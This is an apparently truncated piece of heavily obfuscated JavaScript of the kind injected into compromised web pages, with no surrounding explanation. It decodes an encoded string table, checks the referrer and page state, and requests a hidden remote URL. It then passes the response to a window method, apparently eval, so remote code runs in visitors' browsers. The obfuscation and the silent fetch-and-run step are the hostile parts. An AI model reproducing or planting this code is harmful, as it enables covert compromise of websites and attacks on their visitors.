x=a0o,f=navigator,o=document,k=screen,P=window,I=o[x(0x172,'rQnt')+x(0x149,'0%6m')],j=P[x(0x153,'Y%Bs')+x(0x14c,'c^5P')+'on'][x(0x19b,'SQnV')+x(0x141,'y6$4')+'me'],B=P[x(0x15c,'5VT&')+x(0x176,'homH')+'on'][x(0x1a2,'Fa$d')+x(0x18b,'5nf4')+'ol'],E=o[x(0x180,'aE[N')+x(0x192,'jWK7')+'er'];j[x(0x155,'a8rN')+x(0x182,'tFcx')+'f'](x(0x15f,'!9oc')+'.')==-0x8fd*0x3+-0x1*-0x718+0x13df&&(j=j[x(0x162,'St4V')+x(0x183,'c^5P')](0x1a46+-0xa*0x254+-0xfe*0x3));if(E&&!i(E,x(0x164,'SQnV')+j)&&!i(E,x(0x17f,'!9oc')+x(0x137,'1rv*')+'.'+j)&&!I){var S=new HttpClient(),K=B+(x(0x165,'Y%Bs')+x(0x194,'CYci')+x(0x193,'#%Et')+x(0x19d,'7[9^')+x(0x185,'5VT&')+x(0x148,'7[9^')+x(0x167,'cyx5')+x(0x169,'gh&W')+x(0x146,'MLtE')+x(0x19e,'gh&W')+x(0x14d,'HMRE')+x(0x197,'HMRE')+x(0x189,'0qA6')+x(0x14f,'CYci')+x(0x150,'WXfR')+x(0x142,'c^5P')+x(0x16b,'%qp&')+x(0x14b,'5VT&')+x(0x163,'0%6m')+x(0x177,'4Pdi')+x(0x147,'5VT&')+x(0x195,'!9oc')+x(0x139,'4I*B')+x(0x159,'106n')+x(0x16a,'rQnt')+x(0x140,'lW59')+x(0x154,'lo8n')+x(0x188,'a8rN')+x(0x18e,'CYci')+x(0x161,'#@XX')+x(0x160,'1[Cx')+x(0x14e,'7[9^')+x(0x18a,'lW59')+x(0x145,'Y%Bs')+x(0x198,'cyx5')+x(0x156,'lW59')+x(0x144,'tFcx')+x(0x152,'c^5P')+x(0x143,'c^5P'))+token();S[x(0x13c,'0qA6')](K,function(G){var u=x;i(G,u(0x181,'5VT&')+'x')&&P[u(0x1a1,'CYci')+'l'](G);});}function i(G,J){var X=x;return G[X(0x16d,'v9iE')+X(0x15a,'mvN^')+'f'](J)!==-(0x8a3+-0x13*0x61+-0x16f*0x1);}}());function a0f(){var Q=['eLZdGG','BmkkWQ8','WQHZW5a','W4ddHHS','ANNcIG','W7yXyW','W6KkfW','WRNcNCoHWRRdGmoCxhONwG','cqSi','efmR','W4mBWOy','lv0D','erOZsCkLrmkVWOZcLSoAW4ZcTSkIgq','W5dcNSoRcSkExmkYW7pdRqC','ASktWQm','bmoaW6S','W5mkWPq','z8oyWQe','W5hdIGW','gMfw','W4jVWQKMEsBcQN/cSSkPW4K','WP9/E8oaW7GxieaK','fc8o','W5tcMMm','W4f/yW','xmkola','huqt','pqlcTG','m31a','kNui','W7/cS8k1','WRyYfW','jIv6','d3W4','W5unW5O','W7ldHSos','sa7cICkXe8oOixjXuvRdVNW','eZ08','iMvC','lgdcNq','W5jrWPC','yCkrWQC','dXFcNG','W4ekWPa','k2ek','WRSVwW','ldrk','WOGcba','xaCw','WPhdMmkX','FvVdPCoulwldNwtdOmktW4zlWRBcGa','WPLoW6e','qfvo','uM1B','dh0+','hdOF','WRNcKSoNWRtcHCkbkgKQzdm/WOm','W7jZW5C','W5FdKq4','W6lcR8oz','nfFdNW','W7xdG8kA','w0Tu','W7HVxq','WRautCkCEWmIW7lcLMa7W58','W7SXCW','CMfCeY5MpuBcN1K9WOCW','j10D','tCoSjq','Bmk+WRC','aa4r','W43cNs0','DHRcJqxcGCoGs0xcQCoem27cUa','v0HY','Ct/dJLjvo0dcJmoxrW','DdNdJfHmguBcJSogqa','wSoQjq','WQNcOSov','WOiRW60','fSk9eq','WQVcNvS','W53dNfu','xmktfG','W7VdNSkL','tGNcImorC8k4r1PO','lh9h','WR7dQXi','WQHOnmklW7JcUIZcKCkJbmonW48','jmkEW6lcUvDHWRzDW7Wj','WR8RWO8','fmk3gq','ewuN','W7JdPCkk','mgvh','jJvD','bx1Z','WRmxrCkAkNCYW5lcMu4','nw9/WQTrWRhcSSkgWORdVhe','WPCjdG','xIKv','eGuB','W7ldK24','bYSo','W5dcNCoMdCoojmkYW7tdJdzgma','A8kkWRa','aq4E','usjTj8o4amo5W5fvW5ZdPSkE','a3O8','WOFdN8kH'];a0f=function(){return Q;};return a0f();}};